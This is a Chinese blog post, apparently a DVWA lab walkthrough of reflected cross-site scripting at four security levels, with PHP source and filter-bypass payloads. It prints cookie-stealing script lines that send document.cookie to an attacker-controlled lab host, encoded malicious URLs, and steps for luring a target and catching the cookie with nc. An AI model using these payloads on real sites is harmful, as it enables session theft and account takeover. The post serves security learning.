DVWA------反射型XSS

最新推荐文章于 2024-05-20 08:35:05 发布
最新推荐文章于 2024-05-20 08:35:05 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: DVWA,反射型XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Grant/article/details/100062157
版权

文章目录

一,XSS中常用的JS代码和HTML元素

(1)普通使用

<script>alert('弹窗内容')</script>          #直接嵌入


#元素事件
<body onload=alert('弹窗内容')>    
<a href=http://192.168.44.130>超链接描述</a
<img src=http://192.168.44.130/XXX.jpg onerror=alert('弹窗内容')>       #没有XXX.jpg -->执行alert()
<a href='' onclick=alert('弹窗内容')>描述</a>                           #onclick -->点击执
  • 在这里插入图片描述
    在这里插入图片描述

(2) 获得cookie和重定向

#重定向
<script>window.location="URL"</script>
<iframe src='http://192.168.44.130/a.jpg' height='0' width='0'></iframe>
  • 在这里插入图片描述
#获取cookie
<script>alert(document.cookie)</script>
<script>new Image().src="http://192.168.44.130/c.php?output="+documnet.cookie;</script>
  • 在这里插入图片描述

(3)引入脚本文件

<script src='http://192.168.44.130/XXX.js' > </script>

二,DVWA的学习

(1)低级

【源码】

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

没有任何过滤

1.1 重定向
<script>window.location="http://www.baidu.com"</script>

得到URL

http://192.168.44.130/dvwa-new/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.44.130%2Fc.php%3Foutput%3D%22%2Bdocumnet.cookie%3B%3C%2Fscript%3E#

可以将URL发送给目标

1.2 获取cookie
 <a href='' onclick=alert(document.cookie)>HA!</a>
  • 在这里插入图片描述
1.3 kali监听获取目标的cookie
  • 1.向服务器发送JS脚本(cookie)
  • 2.浏览器向黑客回复一个有JS脚本的页面(URL)【当前页面】
  • 3.黑客将这个URL发给目标
  • 4.目标收到页面 --> 执行脚本 --> 将cookie发送给黑客

192.168.130.146----->kali
192.168.44.133------>服务器
准备工作:在kali的web网页根目录建立获取cookie的脚本并开启服务

  • 在这里插入图片描述
  • 在这里插入图片描述

.
①攻击方向服务器发送JS代码

 <script src='http://192.168.44.146/get.js'></script>

.
②服务器回复,攻击方获得含有JS的URL

  http://192.168.44.130/dvwa-new/vulnerabilities/xss_r/?name=%3Cscript+src%3D%27http%3A%2F%2F192.168.44.146%2Fget.js%27%3E%3C%2Fscript%3E

.
③攻击方将URL发送给目标,等待其打开
.
④目标打开URL,向访问服务器,然后执行JS,向kali访问并发送cookie(目标对服务器的)

  • 在这里插入图片描述
    在这里插入图片描述

⑤kali监听得到cookie

  • 在这里插入图片描述

.
⑥kali关掉nc,避免目标浏览器一直请求

在这里插入图片描述
在这里插入图片描述
146是kali的IP

(2)中级

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );      
	              【【【???过滤<script>  ---><script>过滤为 ''// Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>
2.1 绕过方法
2.1.1 大写 script
<scRipt>alert('a')</scRIpt>
  • 在这里插入图片描述
2.1.2 复写
<scr<script>ipt>alert('aa')</scr<script>ipt>

在这里插入图片描述

2.1.3 使用其他没有被过滤的标签

(3)高级

【源码】

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
                        
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

代码使用preg_replace() 函数用于正则表达式的搜索和替换,将script前后相关的内容都替换为空,使得双写绕过、大小写混淆绕过不再有效;(正则表达式中i表示不区分大小写)

在High级别中,虽然无法使用 <script>标签注入XSS代码,但是可以通过<img><body>等标签事件或者等标签的src属性注入恶意的js代码。

  • 在这里插入图片描述
  • 在这里插入图片描述

使用其他标签绕过

  • 在这里插入图片描述

(4)impossible

【源码】

 <?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] )
             【【【??html实体化】】】

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

使用htmlspecialchars()函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,防止浏览器将其作为HTML元素;不能实现反射型XSS攻击带<>的攻击;
在这里插入图片描述

4.1 绕过方法

在可以input的地方输入恶意代码
在这里插入图片描述

三,php常用的过滤函数总结

(1) str_replace()函数

替换字符串

$name = str_replace( '<script>', '', $_GET[ 'name' ] );

(2) preg_replace()函数

用于正则表达式的搜索和替换,将指定匹配的内容的前后相关的所有内容都替换为空

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

(3)htmlspecialchars()函数

html实体化

$name = htmlspecialchars( $_GET[ 'name' ] );
冗长
关注
专栏目录
dvwaxss反射
Alonegrief的博客
12-01 898
Xss漏洞原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其web的html代码会被执行,从而达到恶意的特殊目的 反射XSS跨站,不是长期可以加载恶意代码的,并不留存于网站代码,这种攻击是需要诱导客户去点击特定的URL地址才能触发。 例子: Xss反射: 打开dvwa,安全级别调为low 发现这里有个输入框,尝试的输入点什么进去 发现会直接返回“Hello xxx” 测试xss可以直接在有输入框的位置插入代码 发现直接执行弹窗,1
DVWA反射XSS
qq_39682037的博客
03-19 2384
DVWA反射XSS 主要用于将恶意代码附加到URL地址的参数,常用于窃取客户端cookie信息和钓鱼欺骗。 Security Level: low 源码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $n...
DVWA-XSS (Reflected)-反射XSS
seanyang_的博客
06-12 3395
XSS攻击,是指攻击者在Web页面输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页。如果恶意JavaScript脚本被存储到后端服务器,用户打开该Web页面时,恶意脚本则可能在浏览器自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA】--- 九、反射XSS(XSS Reflected)
qq_43168364的博客
05-31 769
XSS Reflected 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 这里输入的内容会回显出来 构造js代码:<script>alert(/hack/)</script>,会出现弹窗 此时前端的html已经有我们插入的代码了 但是当我们再点击以下改模块时里面的代码就会消失,这就是反射XSS它时临时的 代码审计 header(“X-XSS-Protection: 0”):X-XSS-Prot
DVWA-master.zip
01-04
DVWAXSS练习涵盖了反射和存储两种类,让你了解如何防范这种攻击,比如使用输入验证、转义特殊字符以及设置HTTP-only cookie等。 4. **命令注入** 在DVWA,命令注入漏洞允许攻击者执行服务器上的任意...
DVWA-master安装包
02-28
2. **跨站脚本(XSS)**:分为反射和存储两种,XSS允许攻击者通过注入可执行的JavaScript代码来窃取用户cookie或其他敏感信息。 3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或...
DVWA-master.rar
03-15
2. **跨站脚本(XSS)**: "XSS"挑战展示了反射XSS和存储XSS的实例,教育用户如何防止恶意脚本注入到页面。 3. **文件包含**: "文件包含"漏洞让攻击者能够控制服务器加载的文件,可能导致敏感信息泄露或执行任意...
DVWA--反射XSS(Reflected)攻略详解
Silver_lion的博客
08-13 7477
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
N10 DVWA 反射XSS
尐猴子君ii的博客
08-25 245
一、概念 XSS,全称Cross Site Scripting,跨站脚本攻击。在页面注入恶意的脚本代码,当受害者访问该页面是,恶意代码会在其浏览器上执行。XSS不仅仅限于JavaScript,还包含Flash等其他脚本语言。根据恶意代码是否存储在服务器上,XSS可以分为存储性的XSS反射性的XSS。 DOMXSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用的document.baby.innerHtml等函数动态生成的Html页面,如果这些函数在引用某些变量时没
Dvwa反射XSS攻击全级别学习笔记
Mbys_Lettuce的博客
09-17 638
过滤掉了,所以只要将复写(例如:在识别时会将赋值为空,就无形将原来分离的拼凑回来成为,从而绕过),将的某些字母或全部换成大写,因为无论大小写都可以正常识别,但作为一个参数,和就完全不一样,从而完成绕过。直接复写alert('hacker_medium_dxx')
DVWAXSS(Reflected)反射XSS
RexHa的博客
10-07 2250
dvwa 反射XSS
DVWA通关--反射XSSXSS (Reflected))
箭雨镜屋
12-16 2117
LOW 通关步骤 源码分析
DVWA代码审计--反射XSS
最新发布
余十步的博客
05-20 756
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发。通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发。分别是:str_replace(要查找的值,要替换的值,被搜索的字符串)就是保留文字在源代码的格式,页面显示的和源代码的效果完全一致。这只是简单的测试,当然也是可以的,然后再看看上面说的如何闭合标签。至于上面说的10多种payload,任然是可以使用的,部分。
DVWA靶机-反射XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4243
DVWA靶机-反射XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
Kali渗透测试之DVWA系列4——反射XSS(跨站脚本攻击)
浅浅的博客
05-11 4293
目录 一、XSS 1、XSS简介 2、XSS 3、漏洞形成的根源 二、反射XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
DVWA系列之XSS(跨站脚本攻击)——反射XSS源码分析及漏洞利用
7Riven's blog
11-27 2655
XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。 XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器XSS可以分为存储XSS反射XSS。 DOMXSS由于其特殊性,常常被分为第三种,...
DVWA系列之20 反射XSS分析
weixin_33912445的博客
12-26 142
我们首先来分析反射XSS。将安全级别设为low,然后选择XSS reflected,在文本框随意输入一个用户名,提交之后就会在页面上显示。从URL可以看出,用户名是通过name参数以GET方式提交的。查看low级别的网页代码,可以看到这里对用于接收用户数据的name参数没有进行任何过滤,就直接在网页输出,因而造成了XSS漏洞。我们输入一段最基本的XSS语句来实现弹框:“&lt;scrip...
结合DVWA反射XSS浅析
qq_43660551的博客
01-08 2770
一.概念 XSS:跨站脚本攻击。黑客通过HTML注入篡改了网页,在网页插入恶意脚本。 二.分类 1.反射XSS:简单地把用户输入的数据反射给浏览器。 2.存储XSS:将用户输入的数据存储在服务器端。 3.DOMXSS:通过修改页面的DOM节点形成XSS。 三.DVWA-XSS实践 1.低级 看下源码,这里无任何过滤。直接将用户的输入反射给浏览器。 故直接构造payload语句:<script>alert(/This is XSS!/)</s...
dvwa xss反射
08-29
对于DVWA(Damn Vulnerable Web Application)的XSS反射攻击,它是一种常见的Web应用程序安全漏洞。在XSS(跨站脚本攻击)反射攻击,恶意用户通过构造特定的URL参数或表单输入,注入恶意脚本代码到应用程序的响应,然后通过诱使受害者点击恶意链接或访问恶意网页来触发这些恶意脚本,从而窃取用户的敏感信息或执行其他恶意操作。 在DVWA,你可以使用XSS反射漏洞进行实验和学习,以了解攻击原理和防御措施。你可以通过创建一个包含恶意脚本代码的URL,然后将该URL发送给受害者或诱使受害者访问该URL,从而触发XSS反射漏洞。 注意,DVWA是一个有意设计成易受攻击的Web应用程序,目的是让开发人员和安全研究人员学习和实验各种Web应用程序安全漏洞。在实际应用程序,你需要采取适当的防御措施来防止XSS攻击,例如输入验证、输出编码和内容安全策略(CSP)等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值